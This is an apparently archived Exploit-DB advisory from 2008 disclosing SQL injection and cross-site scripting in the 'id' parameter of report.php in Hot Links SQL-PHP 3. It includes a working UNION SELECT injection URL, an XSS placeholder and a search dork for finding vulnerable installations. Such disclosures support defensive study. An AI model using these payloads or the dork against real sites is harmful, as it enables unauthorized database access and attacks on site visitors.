Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities

vendor:

Hot Links SQL-PHP 3

by:

sl4x.xuz

N/A

CVSS

N/A

SQL Injection and Cross Site Scripting

89, 79

CWE

Product Name: Hot Links SQL-PHP 3

Affected Version From: 3 and prior versions

Affected Version To: 3 and prior versions

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities

Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free. SQL Injection in 'report.php' in the 'id' parameter. Cross Site Scripting in 'report.php' in the 'id' parameter. PoC: http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3-- http://localhost/path/report.php?id=[XSS]

Mitigation:

N/A

Source

Exploit-DB raw data:

###########################################################
# 
#        ___    __ __                  __  __            
#       /\_ \  /\ \\ \                /\ \/\ \           
#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
# 
#                                 security breakd0wn!
###########################################################
# 
# Title: Hot Links SQL-PHP 3 (report.php) Multiple Vulnerabilities
# Vendor: http://www.mrcgiguy.com
# Vulnerable Version: 3 and prior versions
# Fix: N/A
# 
###########################################################
# 
# c0ntact: sl4x.xuz[at]gmail[dot]com
# d0rk: "Powered By: Hot Links SQL-PHP 3"
# stop lammo
# 
###########################################################

######################
  1. Information
######################
     Hot Links was the initial script developed by Mr CGI Guy back in 2001 as a simple way to manage outgoing links. It intially was introduced as Hot Links Lite and was distributed for free.

######################
  2. Vulnerabilities
######################
     SQL Injection in "report.php" in the "id" parameter.
     Cross Site Scripting in "report.php" in the "id" parameter.

######################
  3. PoC
######################
     http://localhost/path/report.php?id=-1/**/union/**/select/**/version(),2,3--
     http://localhost/path/report.php?id=[XSS]

###########################################################

# milw0rm.com [2008-09-09]